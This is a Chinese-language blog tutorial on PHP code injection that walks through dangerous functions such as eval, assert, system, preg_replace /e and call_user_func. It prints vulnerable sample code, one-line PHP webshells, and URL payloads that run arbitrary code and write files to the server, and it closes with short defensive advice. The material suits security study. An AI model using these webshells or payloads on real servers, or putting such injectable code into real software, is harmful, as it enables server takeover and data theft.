PHP代码注入详解

最新推荐文章于 2024-04-16 20:35:04 发布
最新推荐文章于 2024-04-16 20:35:04 发布
阅读量4.8k 收藏 5
点赞数
分类专栏: 网络安全学习 文章标签: php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/119732562
版权

PHP代码注入的原理和解析

PHP代码注入靠的是RCE,即远程代码执行。
指应用程序过滤不严,hacker可以将代码注入到服务器进行远程的执行。
危害和SSRF相似,通过这个漏洞可以操控服务器的动作。
最典型的就是一句话木马
PHP代码漏洞注入的两个要素:

  • 程序中含有可执行的PHP代码函数
  • 传入第一点的参数,客户端可控,直接修改或者影响

下面将对PHP相关函数和语句以及注入方法进行解释

eval()

eval()函数在很多语言中都有,比如Python、PHP。
eval函数的作用是将字符串作为PHP语句来执行
例如

<?php
if(isset($_GET['code']){
	@$code=$_GET['code'];  //使用@表示不显示错误
	eval($code);
}else{
	echo "please submit code!"
}
?>

当然也可以不适用$_GET,使用其他预定义超全局数组变量都可以。

如果此时我在里面输入:

http://www.abc.com/code?=phpinfo();

就可以弹出php的信息。

assert()函数

这个函数和eval()函数一样,同样可以将函数里面的内容作为PHP代码执行:
但是eval()是语句结构,assert()函数的功能更加全面。
如果在代码注入的时候发现eval() 没有用的话可以尝试替换位assert()函数。

<?php
if(isset($_GET['code']){
	$code=$_GET['code'];
	assert($code);
}else{
	echo "please submit code!"
}
?>

其用法和eval()一致。

system()函数

传递的字符串command作为系统命令执行,并且将指返回给第二个参数return_var

system(string $command, int &$return_var): string

所以,综上所述,一句话木马都可以表示为:

<?php @eval($_GET["sky"]);?>

<?php @assert($_GET["sky"]);?>

<?php @system($_GET["sky"]);?>

preg_replace()函数

mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )

搜索 subject 中匹配 pattern 的部分, 以 replacement 进行替换。

参数说明:

  • $pattern: 要搜索的模式,可以是字符串或一个字符串数组。

  • $replacement: 用于替换的字符串或字符串数组。

  • $subject: 要搜索替换的目标字符串或字符串数组。

  • $limit: 可选,对于每个模式用于每个 subject 字符串的最大可替换次数。 默认是-1(无限制)。

  • $count: 可选,为替换执行的次数。

这个有什么注入点?当/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码来执行。
比如:

$template = preg_replace("/[\n\r\t]*\{block\/(\d+?)\}[\n\r\t]*/ie", "\$this->blocktags('\\1')", $template);

call_user_func()函数

把第一个参数作为回调函数调用。

<?php
if(isset($_GET['fun'])){
	$fun=$_GET['fun'];
	$para=$_GET['para'];
	call_user_func($fun,$para);
}
?>

如果我们传递参数:

http://www.abc.com/?fun=assert&para=phpinfo()

意思就是,fun需要书写一个真实的函数,而para这是这个函数的参数,这样传参也可以被执行。

此时这里fun不能使用eval,因为eval是语句结构,建议使用assert。

$a($b)函数

这是动态函数的写法,和call_user_func()参数的传递有些类似

if(isset()){
	$a=$_GET['a'];
	$b=$_GET['b'];
	$a($b);
}

常见的PHP代码注入还有这些:
eval(),,assert(), system(),preg_replace(), create_function, call_user_func, call_user_func_array,array_map(),反引号,ob_start(),exec(),shell_exec(),passthru(),escapeshellcmd(),popen(),proc_open(),pcntl_exec()
遇到了再查吧,我是记不住那么多

漏洞利用

下面列出简单的漏洞利用方法:

  • 一句话木马:?code=@eval($_POST['password']);
  • 获取文件当前绝对路径:__FILE__是预定义常量,为文件的当前绝对路径,用法:?code=print(__FILE__);
  • 写文件:使用file_put_contents()函数。前提是要知道可写目录,可以用hackbar进行提交,例如:?code=var_dump(file_put_contents($_POST['a'],$_POST['b'])); 然后再hackbar使用post提交为:a=a.php&b=<?php phpinfo();?>,然后就可以在当前目录下创建一个a.php文件了

防御方法:

  • 不要使用eval函数
  • 如果使用一定要经过严格的过滤
  • preg_replace放弃使用/e修饰符
  • disable_functions=assert()
Zeker62
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
详解php命令注入攻击
10-17
主要介绍了php命令注入攻击,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
php依赖注入知识点详解
10-16
依赖注入(Dependency Injection,简称DI)...总之,依赖注入PHP开发中的一个重要概念,它能够帮助我们编写更松散耦合、易于测试和维护的代码。理解和熟练使用依赖注入,对于提升PHP开发的专业性和项目质量至关重要。
php注入详解
weixin_33907511的博客
03-02 78
本文主要是为小菜们服务的,如果你已经是一只老鸟呢,可能某些东西会感觉比较乏味,但只要你仔细的看,你会发现很多有趣的东西哦。 阅读此文你只要明白下面的这点东西就够了。 1.明白php+mysql环境是如何搭建的,在光盘中我们收录搭建的相关文章,如果您对搭建php+mysql环境不是很清楚,请先查阅此文,在上一期的专题中也有所介绍。 2.大概了解php和apache的配置,主要...
有回显代码执行-无字母数字RCE进阶PHP5
最新发布
asdfaa的博客
04-16 797
可以执行,符合正则匹配,但无法获取flag值;
PHP注入原理-详解(写给自己)
冰点的博客
10-24 226
要***一个网站,当然首先是看看网站的结构了。打开大学生创业网的主页,可以明显看到是PHP的。主页上有N多PHP连接。随便打开一个,地址也挺诱人的,是那种经典的php?id=的页面。但是PHP注入和ASP注入虽不完全相同,但是判断是否存在注入的方法还是一样的。首先,在地址后面加上经典的“and 1=1”,回车,页面返回正常。再把“and 1=1”改成“and 1=2”,回车...
Php注入原理
jahn的专栏
10-26 787
Php的环境一般是apache+php+mysql,平常配置服务器一般是打开php.ini里的安全模式,将safe_mode设为on,还有就是将display_erors设为off,即关闭错误显示。还有一个非常重要的配置选项-----magic_quotes_gpc,高版本默认为on,以前的版本中默认为off。当magic_quotes_gpc为on的时候我们怎么防范php的字符变量注入呢?其实只
php注入过程详解,php注入详解
weixin_42524013的博客
03-23 326
本文主要是为小菜们服务的,如果你已经是一只老鸟呢,可能某些东西会感觉比较乏味,但只要你仔细的看,你会发现很多有趣的东西哦。阅读此文你只要明白下面的这点东西就够了。1.明白php+mysql环境是如何搭建的,在光盘中我们收录搭建的相关文章,如果您对搭建php+mysql环境不是很清楚,请先查阅此文,在上一期的专题中也有所介绍。2.大概了解php和apache的配置,主要用到php.ini和httpd...
PHP代码注入是什么意思?底层原理是什么?
长风破浪会有时的博客
05-13 335
当应用程序接收到用户提交的数据时,如果没有对数据进行充分的过滤和验证,攻击者就有可能通过构造恶意的输入,在应用程序中注入一些非法的代码PHP代码注入(Code Injection)指的是攻击者通过构造恶意的输入,在应用程序中注入一些非法的代码,从而在应用程序中执行攻击者的指令或代码。这种攻击方式通常会利用应用程序的漏洞,例如未对输入数据进行充分的过滤和验证,导致攻击者可以在应用程序中执行任意代码,造成严重的安全风险,如数据库被盗、系统崩溃等。
php注释符手工注入,php手工注入
weixin_29359515的博客
03-10 152
http://www.rfidchina.org/products/product.php?id=9740URL后面加上'后,返回的页面虽然没有什么错误信息之类的,页面出错缺失了内容,然后是and 1=1 、and 1=2 ,分别是正常信息和'的页面,在9740前面加了个负号“ - ” ,它没什么意义,和and 1=2 一个作用,出错,http://www.rfidchina.org/produc...
php中的依赖注入实例详解
10-16
总的来说,依赖注入是提高代码可扩展性和可测试性的重要设计原则。通过将依赖关系明确地暴露出来并由外部控制,我们可以在不修改原有代码的情况下,灵活地替换或调整依赖,这在维护和扩展大型项目时尤为关键。同时,...
php防止SQL注入详解及防范
12-19
对于攻击者来说,进行SQL注入攻击需要思考和试验,对数据库方案进行有根有据的推理非常有必要(当然假设攻击者看不到你的源程序和数据库方案),考虑以下简单的登录表单:复制代码 代码如下:<form action=”/...
CTF之路:关于PHP eval() 注入问题
zw05011的博客
01-03 4553
CTF之路:关于PHP eval() 注入问题
PHP为什么需要依赖注入?底层原理是什么?
长风破浪会有时的博客
04-12 191
当需要实例化一个对象时,通过反射机制获取该对象的构造函数、方法或属性列表,并根据参数列表中的类型或名称,自动实例化或注入该参数所需的依赖对象。在 PHP 中,依赖注入通常通过构造函数注入、方法注入或属性注入来实现。具体来说,构造函数注入是指在对象创建时通过构造函数传入依赖对象;依赖注入是一种解决这些问题的设计模式,它将对象之间的依赖关系从对象内部转移到外部,使得代码更加松耦合、易扩展和易维护。通过使用依赖注入,可以将对象之间的依赖关系解耦,从而使得代码更加松散耦合、易扩展和易维护。
PHP无字母数字构造Webshell
西部壮仔的博客
02-03 1664
题目 index.php: <?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)>40){ //检测字符长度 die("Long."); } if(preg_match("/[A-Za-z0-9]+/",$co...
php命令注入
weixin_54252904的博客
04-17 584
eval() <?php if(isset($_REQUEST['code'])){ @$str=$_REQUEST['code']; eval($str); } ?> <?php if(isset($_GET['code'])){ @$str=$_GET['code']; eval($str); } ?> 提交变量[?code=phpinfo();] 我们提交以下参数也是可以的 [?code=${phpinfo()};] [?code=1;phpinfo();
CTFSHOW PHP特性篇 (下篇132-150)
羽的博客
10-21 4657
web132 if(isset($_GET['username']) && isset($_GET['password']) && isset($_GET['code'])){ $username = (String)$_GET['username']; $password = (String)$_GET['password']; $code = (String)$_GET['code']; if($code === mt_rand(1,0x
php里怎么用if语句_PHP中if相关条件语句该如何理解使用?
weixin_28738021的博客
03-08 3488
我们在开发PHP页面时,有时候会需要根据不同条件从数据库或者页面中读取信息,然后再执行相应的语句。涉及到这方面的需求时,我们就要了解掌握PHP中一些条件语句的使用。本篇文章就给大家详细的介绍PHP中if条件判断语句、if...else条件语句以及if...elseif...else多条件语句的具体使用方法。下面我们通过具体的代码示例,给大家做详解。一、PHP if条件判断语句代码示例:...
ctfshow web入门 php特性
Sentiment的博客
04-11 5247
web89 intval() 函数用于获取变量的整数值,可preg_match过滤了数字,这里可以用数组绕过,因为preg_match无法处理数组 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if
php 木马 加密,PHP木马大全 一句话的PHP木马的防范
weixin_34208400的博客
03-09 1331
PHP木马大全一句话的PHP木马的防范(2015-01-28 22:12:07)标签:it分类:phpphp后门木马常用的函数大致上可分为四种类型:1. 执行系统命令: system, passthru, shell_exec, exec, popen,proc_open2. 代码执行与加密: eval, assert, call_user_func,base64_decode,gzinflat...
spring依赖注入详解
03-12
作为一个 AI,我可以回答你关于 Spring 依赖注入的问题。Spring 依赖注入是一种设计模式,它通过将对象之间的依赖关系从代码中移除,使得代码更加灵活、可维护和可测试。Spring 通过使用反射和配置文件来实现依赖注入,可以将对象之间的依赖关系自动注入到对象中,从而减少了手动编写代码的工作量。如果你有更具体的问题,我可以为你提供更详细的解答。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值